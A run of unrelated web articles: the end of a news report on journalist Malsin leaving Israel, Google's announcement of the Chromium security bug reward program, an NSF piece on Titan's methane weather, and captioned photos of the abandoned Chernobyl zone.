It said it was " deeply concerned " there was no lawyer present when Mr Malsin apparently signed the document , and it was " inexplicable " that he would knowingly drop the legal challenge .
" Without jumping to conclusions , Maan wants to be sure these events did not take place under duress , " the agency said .
Mr Malsin has been unable to comment while in transit , but a colleague said he sounded " shaken and confused " when he called briefly on Wednesday to say he was due to be flown to New York .
Interior Ministry spokeswoman Sabine Haddad said Mr Malsin had waited in detention in the airport until a court hearing could be secured .
" He apparently did not like this and chose to leave the country , " she said .
Incorrect visa
When Mr Malsin was initially detained , Israeli security officials said security concerns had arisen when he was questioned .
An official report on the questioning , which Maan said it had received during legal proceedings , accused Mr Malsin of failing to arrange the correct visa , but did not give details .
It said he was suspected of " exploiting the fact that he is Jewish to gain a visa " .
This was apparently on the basis that , when seeking a visa extension previously , he had told Interior Ministry officials he was exploring the option of emigrating to Israel but had written articles critical of the country .
By law Jews from around the world are eligible to emigrate to Israel .
The report also said Mr Malsin had refused to give the name of the friend he said he lived with in the West Bank .
Press freedom advocates have condemned the Israeli decision to refuse him entry .
The International Federation of Journalists said it was an " intolerable violation of press freedom " and " appeared to be a reprisal measure for the journalist 's independent reporting " .
Israeli government spokesman Mark Regev said last week that allegations that the decision was because of Mr Malsin 's journalism were " simply absurd " .
Foreign nationals working or volunteering with Palestinian organisations in the West Bank often complain of difficulty obtaining visas .
Many are present on three - month tourist visas , which do not provide permission to work and may not be extended .
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
In designing Chromium , we 've been working hard to make the browser as secure as possible .
We 've made strong improvements with the integrated sandboxing and our up - to - date user base .
We 're always looking to stay on top of the latest browser security features .
We 've also worked closely with the broader security community to get independent scrutiny and to quickly fix bugs that have been reported .
Today , we are introducing an experimental new incentive for external researchers to participate .
We will be rewarding select interesting and original vulnerabilities reported to us by the security research community .
For existing contributors to Chromium security — who would likely continue to contribute regardless — this may be seen as a token of our appreciation .
In addition , we are hoping that the introduction of this program will encourage new individuals to participate in Chromium security .
The more people involved in scrutinizing Chromium 's code and behavior , the more secure our millions of users will be .
Such a concept is not new ; we 'd like to give serious kudos to the folks at Mozilla for their long - running and successful vulnerability reward program .
Any valid security bug filed through the Chromium bug tracker ( under the template " Security Bug " ) will qualify for consideration .
As this is an experimental program , here are some guidelines in the form of questions and answers :
Q ) What reward might I get ?
A ) As per Mozilla , our base reward for eligible bugs is $ 500 .
If the panel finds a particular bug particularly severe or particularly clever , we envisage rewards of $ 1337 .
The panel may also decide a single report actually constitutes multiple bugs .
As a consumer of the Chromium open source project , Google will be sponsoring the rewards .
Q ) What bugs are eligible ?
A ) Any security bug may be considered .
We will typically focus on High and Critical impact bugs , but any clever vulnerability at any severity might get a reward .
Obviously , your bug wo n't be eligible if you worked on the code or review in the area in question .
Q ) How do I find out my bug was eligible ?
A ) You will see a provisional comment to that effect in the bug entry once we have triaged the bug .
Q ) What if someone else also found the same bug ?
A ) Only the first report of a given issue that we were previously unaware of is eligible .
In the event of a duplicate submission , the earliest filed bug report in the bug tracker is considered the first report .
Q ) What about bugs present in Google Chrome but not the Chromium open source project ?
A ) Bugs in either build may be eligible .
In addition , bugs in plugins that are part of the Chromium project and shipped with Google Chrome by default ( e.g. Google Gears ) may be eligible .
Bugs in third - party plugins and extensions are ineligible .
Q ) Will bugs disclosed publicly without giving Chromium developers an opportunity to fix them first still qualify ?
A ) We encourage responsible disclosure .
Note that we believe responsible disclosure is a two - way street ; it 's our job to fix serious bugs within a reasonable time frame .
Q ) Do I still qualify if I disclose the problem publicly once fixed ?
A ) Yes , absolutely .
We encourage open collaboration .
We will also make sure to credit you in the relevant Google Chrome release notes and nominate you for the Google Security " thank you " section
Q ) What about bugs in channels other than Stable ?
A ) We are interested in bugs in the Stable , Beta and Dev channels .
It 's best for everyone to find and fix bugs before they are released to the Stable channel .
Q ) What about bugs in third - party components ?
A ) These bugs may be eligible ( e.g. WebKit , libxml , image libraries , compression libraries , etc ) .
Bugs will be ineligible if they are part of the base operating system as opposed to part of the Chromium source tree .
In the event of bugs in a component shared with other software , we are happy to take care of responsibly notifying other affected parties .
Q ) Who determines whether a given bug is eligible ?
A ) The panel includes Adam Barth , Chris Evans , Neel Mehta , SkyLined and Michal Zalewski .
Q ) Can you keep my identity confidential from the rest of the world ?
A ) Yes .
If selected as the recipient of a reward , and you accept , we will need your contact details in order to pay you .
However — at your discretion , we can credit the bug to " anonymous " and leave the bug entry private .
Q ) No doubt you wanted to make some legal points ?
A ) Sure .
We encourage participation from everyone .
However , we are unable to issue rewards to residents of countries where the US has imposed the highest levels of export restriction ( e.g. Cuba , Iran , North Korea , Sudan and Syria ) .
We cannot issue rewards to minors , but would be happy to have an adult represent you .
This is not a competition , but rather an ongoing reward program .
You are responsible for any tax implications depending on your country of residency and citizenship .
There may be additional restrictions on your ability to enter depending upon local law .
We look forward very much to issuing our first reward and featuring it on our releases blog .
We 're happy to take questions at security@chromium.org .
Alternatively , feel free to leave a comment .
We will update this blog post with answers to any popular questions .
Finally , if you 're interested in helping out Chromium security on a more permanent basis , we have open positions
Posted by Chris Evans , Google Chrome Security
Research News
Titan : A Climate Out of This World
Researchers using ground - based telescopes and space probes make amazing discoveries about the atmospheric cycle of Saturn ’s largest moon , and find similarities to Earth
Composite visible / infrared view of Titan shows a world with features strikingly similar to Earth .
January 7 , 2010
Our knowledge of Titan has improved considerably over the last five years .
Before that , Saturn 's largest satellite had only been hastily approached by a handful of space probes .
In 1980 , the Voyager - 1 spacecraft took advantage of a flyby to take a few mysterious , yet frustrating , close - ups of Titan 's opaque , rusty atmosphere .
Despite its color , Titan actually seemed to look a lot like the early Earth .
There was a general feeling of excitement and perplexity : what lay beneath this atmosphere ?
Could Titan support life ?
In July 2004 , NASA 's Cassini space probe entered Saturn 's distant realm , this time to stay .
The probe was designed right after Voyager 's visit by a scientific community eager to unveil those new mysteries .
And unveil them it did .
It has been hard to keep up with the flow of discoveries delivered from Titan to Earth since then .
We now know that the 5,150 - kilometer - ( km , or 3,200 - mile - ) wide world has lakes and riverbeds .
Earlier this year , even fog was discovered at Titan 's South Pole .
Even more compelling is the fact that , just like similar features on Earth , all of those features are tightly related .
Evaporated liquids create clouds that are carried around the planet by winds -- and probably cause precipitation .
This has never been seen on any other extraterrestrial body .
Moreover , Titan 's atmospheric cycle is not a water cycle .
It is instead an exotic climate of hydrocarbons that features methane and ethane .
On Earth , those are gases , but the extremely cold temperature of Titan , around minus 290 degrees Fahrenheit ( F , or minus 180 degrees Celcius ) , allows them to be liquid as well ( and maybe even solid ) .
Weather forecast
Titan scientists grew very excited by these discoveries .
" We can study the meteorological cycle on another planetary body involving a different molecule ( methane ) , " said Emily Schaller , of the University of Arizona 's Lunar and Planetary Laboratory .
She started observing Titan from the ground in 2002 , at the beginning of her doctorate , two years before Cassini arrived .
" I was monitoring the weather on Titan using the NASA Infrared Telescope Facility on Mauna Kea .
I looked for daily changes in Titan 's brightness that were due to the presence of clouds . "
Ground - based observatories such as the 3 - meter NASA Infrared Telescope Facility ( IRTF ) might indeed not be as detailed as Cassini for high - resolution pictures , but when it comes to daily monitoring , they are the ideal instruments .
Indeed , Cassini only flies by Titan roughly every two months .
So what is it like to study the daily changes of another world ?
" Nearly every night a spectrum of Titan is taken with IRTF , " Schaller explains .
" Every morning , I download and process that data to determine the amount of cloud cover on Titan .
The result is that I get a daily weather report for Titan . "
The IRTF cannot resolve Titan 's globe : it just sees a point of light .
You can tell when there are clouds because the dot gets brighter at certain wavelengths .
When there seemed to be a cloud showing up in Titan 's atmosphere , Schaller would call her colleague Henry Roe of the Lowell Observatory in Flagstaff , Ariz. , who had a target - of - opportunity proposal on the bigger 8 - meter Gemini North Telescope .
The National Science Foundation - supported Gemini telescope , equipped with adaptive optics , is able to take a resolved picture of Titan 's disk to determine the latitudes and longitudes of the clouds Schaller detected with IRTF .
Schaller continued with these observations for six years , the time it took her to complete her doctoral studies .
" The day I handed in my dissertation , I reduced the daily data and was just shocked .
I thought at first I did something wrong .
I e-mailed Henry Roe , and the next night , he triggered observations on Gemini .
Sure enough , there was a huge cloud in the tropics , " Schaller recalled .
It was the first time such an observation was made .
" I joke that it was Titan 's little present to me , " she added .
More to come
Titan 's climate is expected to change rapidly in the coming months , as the distant Saturn system reached the spring equinox in August 2009 .
" The year on Titan lasts about 30 Earth years .
My thesis lasted six years -- not even a Titan season ! " explains Schaller .
" It is now the equivalent of March 21 on Titan .
When I started my thesis , it was December 22 .
We are now entering an interesting time as Titan is changing seasons , " she adds .
Scientists try to predict what the impact of the coming northern spring will be .
They are using Earth atmospheric models , modified for Titan 's smaller size and temperature .
Titan provides us with an Earth - like , yet alternative , atmospheric circulation system to study .
The observation of seasonal climate changes on an alien world may possibly help us better understand how things work on Earth , too .
This process is called comparative planetology .
Since Titan is so similar to our planet , some scientists are asking whether it could even support life .
" It is much further away from the Sun , " said Schaller .
" The cold temperature means that chemical reactions occur very slowly , so the chances of life are very slim .
Though there might be a chance of life further down in the interior of Titan . "
Indeed , some heat could be preserved inside Titan , and last year , Cassini 's observations provided clues for a potential ocean of hydrocarbons under the surface .
However , if there is life anywhere else in the solar system , many scientists suspect it may be more likely to appear on Jupiter 's icy moon Europa , which is closer to the Sun and likely to have a subsurface ocean of water .
After Cassini and the successful landing of the piggyback European Space Agency Huygens probe on Titan 's surface in 2005 , the scientific community is already thinking about the next mission to explore Titan .
Exotic concepts have been proposed , such as balloons or boats to study the lakes , as part of a so - called Titan Saturn System Mission .
Read more and watch a webcast about the findings in the related press release .
Listen to the winds of Titan here .
-- Marc Neveu , National Science Foundation , nifiou@gmail.com
This Behind the Scenes article was provided to LiveScience in partnership with the National Science Foundation .
Titan ( top ) emerges from behind its parent planet , Saturn .
Tethys is visible at the bottom left .
Credit and Larger Version
Composite visible / infrared view of Titan 's North Pole as seen by the Cassini spacecraft .
Credit and Larger Version
The tropical cloud observed by Emily Schaller from the ground in April 2008 .
Credit and Larger Version
On left , is largest of Titan 's northern lakes .
It has a larger area than Lake Superior ( right ) .
Credit and Larger Version
Investigators
Emily Schaller
Henry Roe
Related Institutions / Organizations
AURA / National Optical Astronomy Observatories
California Institute of Technology
Gemini Observatory
Lowell Observatory
University of Arizona
University of Hawaii Institute of Astronomy
Locations
Arizona
California
Hawaii
Related Programs
Gemini Observatory
NSF Astronomy and Astrophysics Postdoctoral Fellowships
Related Awards
# 0401559 Titan 's Methane Meteorological Cycle
# 0647970 Management and Operations of the Gemini Observatory
# 0525280 AURA Management and Operation of the Gemini Observatory
# 0307929 Robotic and Adaptive Optics Monitoring of Clouds on Titan
Total Grants
$ 368,084
Related Agencies
NASA
“ In matters nuclear one thing is certain : there is no protection in an iron curtain . ” A letter in The Times May 3rd , 1986 .
On the 26th of April 1986 shortly after midnight , to be precise , at 1:23 GMT , there occurred near the Ukrainian town of Chornobyl a tremendous explosion at a huge nuclear power plant , followed by a gradual meltdown of the reactor No. 4 .
Chornobyl is situated 80 miles north - west of Kiev , the ancient capital of Ukraine and the Soviet Union ’s third largest city .
It was by far the worst nuclear reactor accident ever , which immediately sent a radioactive cloud across neighbouring Byelorussia , Poland and the Baltic Republics towards Scandinavia .
Within days , borne by shifting winds , radioactive mists wafted beyond Soviet borders and spread across most of Europe causing anxiety , apprehension and fear .
The most badly affected were the Republics of Ukraine and Byelorussia .
They suffered large scale involuntary irradiation , due to extensive secrecy , and great economic damage .
Furthermore the contaminated air mass passed over large areas of Poland and also over parts of Czechoslovakia , Hungary , Romania and Yugoslavia and a number of West European countries .
Till now the land is abandoned , thousands of houses , thousands acres of the land , everything is now stays almost the same as it was 20 years ago .
Nowadays there guided tours are being conducted to this area .
These photos are made by Alexandr Vikulov , pikul2001@mail.ru while participating in such a trip .
This Soviet Era sign indicates the entrance to Chernobyl county .
Many of the things there stand unchanged since Soviet union times .
This is also a sign from Soviet times on one of the buildings in Chernobyl .
There is life now in Chernobyl , some people decided to return despite the radiation hazard .
The members of this trip have noticed even one building was being renovated .
Still people are very rare on the streets of Chernobyl .
All the pipes now are on top of the ground , because the soild is nuclear polluted .
This is the main square in downtown of Chernobyl .
It is the monument to the people who tried to shut down the nuclear station right after the accident happened .
Many of the died – some same year ( 1986 ) others a little bit later .
This is also that monument .
On the road to the monument there are a lot of signs warning about nuclear pollution , but trees and bushes grew all over them so it ’s possible not to notice such signs .
Nature is not afraid of radiation .
This is kindergatten kindergarten on the way to Chernobyl in one of the abandoned villages .
This is a bedroom in it .
Toys are lying all over the place .
Music notes .
How is it correct to cross a road ?
One more bedroom .
This is a Chernobyl Nuclear Station itself .
Even now people there work , they build a special cover on top of the blown up reactor , so that radiation could not spread further .
They are allowed to work inside not more than 2 minutes a day in special protective uniform , and they get $ 1000 monthly salary for this 2 minute job a day , which is 5 times bigger than an average salary in this region .
Many people try to tune their the dosage indicators so that they show less numbers than they got in reality so that they could work more and earn more .
This was a cultural center for Chernobyl Nuclear Power Plant workers .
Coming inside …
Such huge pictures across the walls were very classy in Soviet 80s .
This is a gym , Soviet symbolics is left untouched .
Probably no other places in former USSR where it can be found so .
Through the floor there is already a tree grew .
Probably a result of some mutation ?
Here is written “ Brave ones ”
Sport equipment .
And that ’s a view to a side - show .
Leaving a gym ..
More Soviet symbolics and portraits of some Soviet leaders .
“ Love ” is written here .
A lonely doll was lost on the asfalt .
Here were the tickets sold to the side - shows .
This was a star turn , the big dipper .
And this is the entrance to it .
Some more toys are left ..
And some more Soviet era signs .
A disposed fire extinguisher .
It has been said that some mad French artist visited an abandoned city and made series of crazy paintings on the walls all across the city .
This was the hotel .
Some more of French paintings .
Some tables are left on the middle of the square .
Look at this Nuclear Hazard sign , it was previously used to be a peaceful sign , now it shows the real state of the things here .
This is a Soviet style mailbox .
Piece of the Soviet architecture …
Inside of School building .
Look how many gas - masks !
Somebody left his shoe in a rush .
That ’s a chemistry classroom .
And this is a teachers room .
This is a class log .
The building of the school suffers demolition …
Guess what it is .
This is inside a hospital .
Inside of a cubicle .
Chess and a medical thing .
Mattresses .
This is an elevator .
It is stuck halfway .
This medical drug is left untouched for 20 years !
And some more drugs untouched .
Beds at the hostpital ’s yard .
Walking across the city .
All these trees were n’t here before the accident , 20 years ago .
They are a new generation .
A dock .
This is another sample of Soviet architecture , 16 stored building with a Soviet state emblem .
Just another view of it .
Another street art on the walls of the abandoned city Chernobyl , all of them appeared after the accident , when first tourists appeared .
And some more on the roof of this 16 stored building from previous photos .
This is the view on the Chernobyl Power Plant .
As it can be seen it stands right in the middle of the city .
This is that emblem .
Some giant letters are scattered across the roof .
What for ?
Who knows ..
A view of totally abandoned city .
Forest came into the city .
Another piece of art …
